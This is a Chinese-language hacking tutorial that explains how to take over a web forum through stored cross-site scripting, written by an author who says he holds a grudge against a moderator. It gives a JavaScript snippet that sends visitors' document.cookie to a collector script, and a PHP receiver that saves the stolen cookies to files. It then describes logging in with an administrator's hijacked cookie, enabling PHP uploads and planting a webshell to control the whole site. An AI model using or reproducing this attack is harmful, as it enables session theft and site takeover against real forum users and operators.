论坛——>入侵者布置的跨站攻击——>转移被入侵这视线(隐蔽)
论坛插入脚本:
var img = new Image();
img.src = 'get_cookie.php?var=' + encodeURI(document.cookie);
但是我不一样,因为他需要诱导人去点击他的链接,但是现在人不是傻子,不会轻易点你的链接。而我是要把脚步插入论坛页面中,这样既隐蔽又省去了诱导的力气
我插入的脚本如下:
**********************************************************************************************
**********************************************************************************************
跨站攻击脚本:
reg.php
************************************************************************************
if (isset($_GET['var'])) {
file_put_contents('./cookie/'.time().'.txt', urldecode($_GET['var']));
}
?>
//转移页面隐蔽上面记录cookie的操作
************************************************************************************
剩下的步骤就是等着鱼自己上钩了
当管理员帐号点入论坛某个页面时,这个页面却被转到了某新闻网站,其实不知,他的cookie已经被记录
拿这个cookie登录论坛,(删东西不推荐哦~~),可以临时开启上传php文件,例如phpwebshell,然后再关闭,这样你就可以很轻松的操控整个论坛站点
为什么选择此论坛做入侵讲解,很简单,这个论坛具备了多个漏洞:
一、论坛有XSS漏洞,没有对输入输出做过滤
二、论坛采用cookie方式记录用户信息
三、对论坛上某个版主看不惯,有点权利乱封号,不过,毕竟论坛不是那个人的,还是对管理员手下留情吧(做人要厚道!)
